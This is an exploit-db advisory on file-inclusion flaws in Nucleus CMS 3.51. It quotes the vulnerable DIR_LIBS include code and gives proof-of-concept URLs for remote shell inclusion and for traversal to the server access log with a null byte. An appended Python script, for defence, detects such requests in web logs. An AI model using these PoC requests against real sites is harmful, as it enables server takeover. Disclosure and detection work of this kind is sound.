Nucleus CMS 3.51 (DIR_LIBS) – Multiple Vulnerabilities

  • Author: eidelweiss
    Date: 2010-04-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12241/
  • ########################################################
    Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerabilities
    ########################################################
     
     
    Author: eidelweiss
     
     
    [+]Software:Nucleus CMS
    [+]Version:	Nucleus v3.51 (other or lower versions may also be affected)
    [+]License: 	GNU/GPL (Free Software)
    [+]Homepage:	http://nucleuscms.org/download.php
    [+]Download:	http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
     ########################################################
     
    [!]Discovered:	eidelweiss
    [!]Contact:	eidelweiss[at]cyberservices[dot]com
    [!]Thank`s:	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
    		JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
     
    ########################################################
     
    -=[Description]=-
     
    Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)
    
    ########################################################
     
    	-=[Vuln Code]=-
    **********************************
    [-][path_to_nucleus]/action.php
    
    $CONF = array();
    require('./config.php');
    
    // common functions
    include_once($DIR_LIBS . 'ACTION.php');
    
    $action = requestVar('action');
    $a =& new ACTION();
    $errorInfo = $a->doAction($action);
    
    **********************************
    [-][path_to_nucleus]/nucleus/xmlrpc/server.php
    
    $CONF = array();
    require("../../config.php");	// include Nucleus libs and code
    include($DIR_LIBS . "xmlrpc.inc.php");
    include($DIR_LIBS . "xmlrpcs.inc.php");
    
    **********************************
    [-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php
    
     	$strRel = '../../../'; 
    	require($strRel . 'config.php');
    	include($DIR_LIBS . 'PLUGINADMIN.php');
    
    ########################################################
     
    	-=[ P0C ]=-
     
    	Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
     
    	Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]
    
    	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
    				or
    	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00
    
    ###############################=[E0F]=###################################
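A detection sketch for the requests shown in the P0C section, added here as an example and not part of the original advisory: it scans web server access log lines for requests to the three listed scripts that carry a `DIR_LIBS` parameter and labels the value. It assumes common/combined log format; the function names, sample log lines, addresses and the `example.invalid` host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory, as path suffixes under the Nucleus root.
AFFECTED = ("/action.php", "/nucleus/xmlrpc/server.php",
            "/nucleus/plugins/skinfiles/index.php")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic); line 3 mirrors the advisory's P0C.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2010:10:00:01 +0000] "GET /blog/index.php?blogid=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Apr/2010:10:00:07 +0000] "GET /blog/action.php?DIR_LIBS=http://example.invalid/placeholder HTTP/1.1" 200 312',
    '203.0.113.5 - - [14/Apr/2010:10:00:09 +0000] "GET /blog/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00 HTTP/1.1" 200 907',
    '192.0.2.10 - - [14/Apr/2010:10:00:12 +0000] "GET /blog/action.php?action=x HTTP/1.1" 302 0',
]

def classify(value):
    """Label an already percent-decoded DIR_LIBS value."""
    reasons = []
    if re.match(r"(?i)[a-z][a-z0-9+.-]*://", value):
        reasons.append("remote-url")      # scheme://... points at another host
    if "../" in value or "..\\" in value:
        reasons.append("traversal")       # climbs out of the application directory
    if "\x00" in value:
        reasons.append("null-byte")       # %00 used to cut off the appended file name
    return reasons or ["param-present"]   # DIR_LIBS never belongs in a request

def scan(lines):
    """Yield (line_no, path, reasons) for requests that set DIR_LIBS."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.endswith(AFFECTED):
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "DIR_LIBS":         # PHP variable names are case-sensitive
                yield no, target.path, classify(value)

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so a `DIR_LIBS` value sent in a POST body or cookie is not visible to this check.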